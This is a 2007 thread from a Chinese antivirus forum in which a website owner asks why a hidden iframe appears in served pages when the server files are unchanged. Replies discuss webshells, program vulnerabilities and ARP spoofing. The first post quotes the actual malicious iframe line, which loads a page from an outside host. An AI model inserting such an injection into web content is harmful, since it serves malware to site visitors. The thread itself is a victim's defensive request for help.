加急！服务器被挂马，所有文件却没有改动... - 瑞星卡卡安全论坛bbs.ikaka.com

瑞星卡卡安全论坛技术交流区 反病毒/反流氓软件论坛加急！服务器被挂马，所有文件却没有改动...

	瑞星“1+2”全新解决方案巡展在广州画上圆满句号		叶院长揭秘：瑞星如何运用AI技术革新网络安全		俄乌冲突加剧网络攻击风险白俄罗斯政府遭APT攻击		瑞星ESM防病毒系统助力矿业大学筑牢网络安全防线
	实力拉满瑞星第五十次通过VB100测评		携手老友，拥抱新精彩 —— 新论坛新活动，感谢你的陪伴		护航司法，瑞星助力山西省高院构建安全防线		人工智能在网络安全领域的风险和机遇

1

1 / 1 页

跳转页

加急！服务器被挂马，所有文件却没有改动...

oumiga2005 初生襁褓狮帖子:9 注册: 2005-05-31 来自:	发表于： 2007-11-13 21:16 \| 只看楼主短消息资料字号：小中大 1楼加急！服务器被挂马，所有文件却没有改动... 刚才，突然发现，网站上所有页面，HTML,ASP，访问时，网页源代码最上面有一个木马代码：如下： <iframe src=http://123s123.cn/admin/95.htm width=20 height=0 frameborder=0></iframe> 后面跟着一些NULL字样的黑框乱码瑞星最新版（今天）没有报警，进FTP检查所有页面生成日期，及所有HTML源码，没有发现上面代码再次访问，所有页面正常，至此，所有页面日期没有被改动，我记下了这个木马的站长统计地址：http://www.cnzz.com/stat/login.php?web_id=686502 请高手分析，这是怎么回事？为什么被挂马，被没有修改HTML,ASP？ [用户系统信息]Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727) 2007-11-14 14:38:34
oumiga2005 初生襁褓狮帖子:9 注册: 2005-05-31 来自:	分享到：

素就像天上的浮云快乐黄口狮帖子:206 注册: 2007-02-13 来自:	发表于： 2007-11-13 21:24 \| 短消息资料字号：小中大 2楼服务器？服务器上装瑞星，太有才了~~~ 检查一下系统日志，安全日志，服务器被挂木马可能性就是：通过网站程序漏洞注入，webshell，等等，服务器漏洞导致被入侵。你现在情况都没有确认，你本地中毒，打开任何网页也有可能有这个代码，误认为是服务器被挂木马，还有就是服务器上中了前端时间流行的病毒也有可能导致web页被加入代码~~~所以说，你给出的不能说明100%是服务器被挂木马
素就像天上的浮云快乐黄口狮帖子:206 注册: 2007-02-13 来自:

oumiga2005 初生襁褓狮帖子:9 注册: 2005-05-31 来自:	发表于： 2007-11-13 21:40 \| 只看楼主短消息资料字号：小中大 3楼 1,能确定，我访问自己站的时候，网页确实有此代码，但从FTP里拉下来这个THML页，找不到代码 2,能确定HTML和ASP文件，文件日期都对 3,能确定访问我的站有此代码时，访问其他站的任何网页没有此代码 4,我访问有此代码时，我让外地的朋友访问此页面，结果他那边显示一切正常。。。 5,能确定我的站有此代码时，在同一服务器上的另一个站，没有问题请高手分析。。。。
oumiga2005 初生襁褓狮帖子:9 注册: 2005-05-31 来自:

素就像天上的浮云快乐黄口狮帖子:206 注册: 2007-02-13 来自:	发表于： 2007-11-13 23:20 \| 短消息资料字号：小中大 4楼服务器也就是说做的是虚拟主机？检查一下你的网站程序，如果是你说的那样，估计被webshell了~~不知道你用的是IIS还是阿帕奇做的web服务器，系统是什么系统~~ 做独立程序程序池没有~如果做了，没的说，应该是通过程序漏洞注入或者webshell，没做还是要查查安全审核！建议你用瑞士军刀扫描一下，看看服务器是否有漏洞！你的网站程序也好好查查是不是有漏洞~
素就像天上的浮云快乐黄口狮帖子:206 注册: 2007-02-13 来自:

oumiga2005 初生襁褓狮帖子:9 注册: 2005-05-31 来自:	发表于： 2007-11-14 14:40 \| 只看楼主短消息资料字号：小中大 5楼我的一个朋友帮忙检查了，确定是内网ARP欺骗攻击所有页面被加了<iframe...
oumiga2005 初生襁褓狮帖子:9 注册: 2005-05-31 来自:

oumiga2005 初生襁褓狮帖子:9 注册: 2005-05-31 来自:	发表于： 2007-11-14 14:41 \| 只看楼主短消息资料字号：小中大 6楼瑞星怎么没有专防ARP的工具。。。
oumiga2005 初生襁褓狮帖子:9 注册: 2005-05-31 来自:

素就像天上的浮云快乐黄口狮帖子:206 注册: 2007-02-13 来自:	发表于： 2007-11-14 14:49 \| 短消息资料字号：小中大 7楼内网欺骗？如果服务器不存在漏洞，内网欺骗只能影响你的网速，不可能修改你的服务器上的页面，你也不是说了你服务器上另外一个网站没有影响，所以看来arp不是真正的问题所在。常常有人通过控制网内一台机器，通过arp欺骗其他的服务器拿到其他服务器上的密码，特别容易的是拿到ftp密码。
素就像天上的浮云快乐黄口狮帖子:206 注册: 2007-02-13 来自:

<<上一主题|下一主题>>

1

1 / 1 页

跳转页

页面顶部

Powered by Discuz!NT